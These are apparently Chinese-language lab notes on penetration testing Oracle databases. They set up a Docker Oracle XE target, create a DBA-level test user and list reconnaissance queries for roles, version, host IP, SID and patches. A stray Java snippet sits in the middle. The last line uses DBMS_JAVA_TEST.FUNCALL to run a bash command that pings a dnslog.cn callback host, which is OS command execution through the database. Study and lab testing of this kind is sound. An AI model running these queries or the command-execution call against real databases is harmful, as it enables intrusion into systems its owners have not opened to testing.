- Oracle 数据库的渗透测试
- ✅ Oracle 注入靶场搭建
- ✅Oracle 数据库服务搭建
- ✅WEB 连库测试
- ✅SQL注入靶场启动
- ❎针对Oracle 的数据库渗透测试
- ✅常用Oracle 数据库渗透语句
- ❎简单渗透实例
- ✅ Oracle 注入靶场搭建
参考链接:Oracle爆错手工注入
oracle数据库注入靶场搭建
oracle服务启动
使用docker进行oracle数据库渗透测试,环境如下:
#dba连接
- 命令一览
// docker下载oracle数据库镜像
docker pull registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
##docker将镜像加载到名称为oracle的容器后台运行,并映射镜像1521端口到本地1521端口
docker run -d -p 1521:1521 --name oracle registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
<!--进入oracle容器的交互式shell-->
docker exec -it oracle bash
sqlplus /nolog
SQL> conn sys/oracle as sysdba
Connected.
SQL> select name from v$database;
NAME
---------
XE
public class hello {
public static void main(String[] args) {
#aasdasdasd
System.out.println("this is a block test message");
System.out.println("hello world");
}
}
- 新增用户赋权
web连库
SQL> create tablespace pentest datafile '/tmp/pentest.dbf' size 100m;
Tablespace created.
SQL> create user pentest identified by pentest default tablespace pentest;
User created.
SQL> grant connect,resource,dba to pentest;
Grant succeeded.
SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
root@bd849e50bab4:/# sqlplus pentest/pentest
SQL*Plus: Release 11.2.0.2.0 Production on Fri Feb 19 06:38:04 2021
Copyright (c) 1982, 2011, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> CREATE TABLE users (id number,name varchar(500),surname varchar(1000));
Table created.
SQL> INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming');
INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (http://sqlmap.org)', 'user agent header');
INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
commit;
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL> commit;
Commit complete.
SQL> SELECT * FROM users where id=1;
ID
----------
NAME
--------------------------------------------------------------------------------
SURNAME
--------------------------------------------------------------------------------
1
luther
blisset
渗透常用语句:
1 当前用户权限
select * from session_roles
2 当前数据库版本
select banner from sys.v_$version where rownum=1
3 服务器出口IP
用utl_http.request 可以实现
4 服务器监听IP d
select utl_inaddr.get_host_address from dual
5 服务器操作系统
select member from v$logfile where rownum=1
6 服务器sid查询,远程连接的话需要
select instance_name fromv$instance;
7 当前连接用户
select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual
版本:
select * from v$version;
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
PL/SQL Release 11.2.0.4.0 - Production
CORE 11.2.0.4.0 Production
TNS for Linux: Version 11.2.0.4.0 - Production
NLSRTL Version 11.2.0.4.0 - Production
oracleShell.jar环境
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
PL/SQL Release 11.2.0.1.0 - Production
"CORE 11.2.0.1.0 Production"
TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
NLSRTL Version 11.2.0.1.0 - Production
select utl_inaddr.get_host_address from dual
172.17.0.2
补丁:
select * from dba_registry_history;
2018-04-25 12:22:17.105985 APPLY SERVER 11.2.0.4 0 PSU Patchset 11.2.0.2.0
权限:
select * from session_roles;
CONNECT
RESOURCE
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_SELECT_ROLE
EXECUTE_CATALOG_ROLE
HS_ADMIN_EXECUTE_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
SCHEDULER_ADMIN
WM_ADMIN_ROLE
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','ping ojuht0.dnslog.cn') from dual;
